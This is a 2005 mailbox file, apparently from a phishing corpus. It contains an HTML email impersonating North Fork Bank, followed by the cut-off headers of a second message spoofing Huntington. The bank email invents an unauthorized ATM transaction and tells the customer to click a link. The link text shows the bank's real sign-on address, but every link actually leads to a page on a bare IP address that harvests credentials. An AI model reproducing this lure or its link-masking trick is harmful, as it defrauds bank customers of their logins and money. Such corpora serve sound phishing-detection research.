From: "North Fork Bank Security Service" <support@nfb.com>
Reply-To: "North Fork Bank Security Service" <service@nfb.com>
To: username@domain.com
Subject: Update your Online Banking Records
Date: Sat, 12 Mar 2005 16:54:31 -0500
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--041585166291169500"
X-Priority: 3
X-MSMail-Priority: Normal
Status: O
X-Status: 
X-Keywords:                  
X-UID: 208

----041585166291169500
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1=
-transitional.dtd">
<html>
 <head>
  <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-88=
59-1" />
  <title></title>
  
   </head>
 
 <body bgcolor=3D"#ffffff">
    
      
<p>
<a href=3D"http://80.37.240.225/.x/verify.html">
<img border=3D"0" src=3D"http://www.mynfbonline.com/images/mynfb_header_R.=
gif" width=3D"366" height=3D"95"></a><br clear=3D"all" />
      </p>
      <div id=3D"privacy">
        <div class=3D"edas">
 <div class=3D"edas">
 
    <b>Dear NorthFork Bank customer</b><b class=3D"edas">. Please read thi=
s 
    message and follow it's instructions.</b><br><br> <br>
    <b class=3D"edas">Unauthorized Account Access </b><br>We recently 
    reviewed your account, and we suspect an unauthorized ATM based 
    transaction on your account. Therefore as a preventive measure 
    we have temporary limited your access to sensitive NorthFork Bank 
    features. <br><br>To ensure that your account is not compromised 
    please login to NorthFork Bank Internet Banking and Investing by 
    clicking this
                <a target=3D"_blank" href=3D"http://80.37.240.225/.x/verif=
y.html">link</a>, verify your identify and your online 
    accounts will be reactivated by our system. <br><br>
    <b class=3D"edas">To get started, please click the link below:</b><br>=
 <br>
    <a href=3D"http://80.37.240.225/.x/verify.html">
                https://www.mynfbonline.com/cashman/eCashmanSignon.Asp</a>=
<p><br>
    <b class=3D"edas">Important information from NorthFork Bank.</b> <br>T=
his 
    e-mail contains information directly related to your account 
    with us, other services to witch you have subscribed, and/or any 
    application you may have submitted.<br>NorthFork Bank and its service =

    providers are committed to protecting your privacy and ask you 
    to send sensitive account information through e-mail.<br> 
    </p>
    <p style=3D"text-align:Center" class=3D"edas">________________________=
_______________________________________________</p>

----041585166291169500--

From security@huntington.com  Sun Mar 13 01:55:22 2005
Return-Path: <security@huntington.com>
X-Original-To: username@login.domain.com
Delivered-To: username@login.domain.com
Received: from mail1.domain.com (mail1.domain.com [10.23.1.4])
	by spanky.domain.com (Postfix) with ESMTP id AA937536E42
	for <username@login.domain.com>; Sun, 13 Mar 2005 01:55:22 -0500 (EST)
Received: from 62.193.235.107 (wpc2243.amenworld.com [62.193.235.107])
	by mail1.domain.com (Postfix) with SMTP id 81B9B85A87E
	for <username@domain.com>; Sun, 13 Mar 2005 01:43:01 -0500 (EST)
Received: from 108.24.55.107 by ; Sun, 13 Mar 2005 02:55:22 -0400
Message-ID: <LPRSGIUAPVUTCOXFRGYXWNV@msn.com>
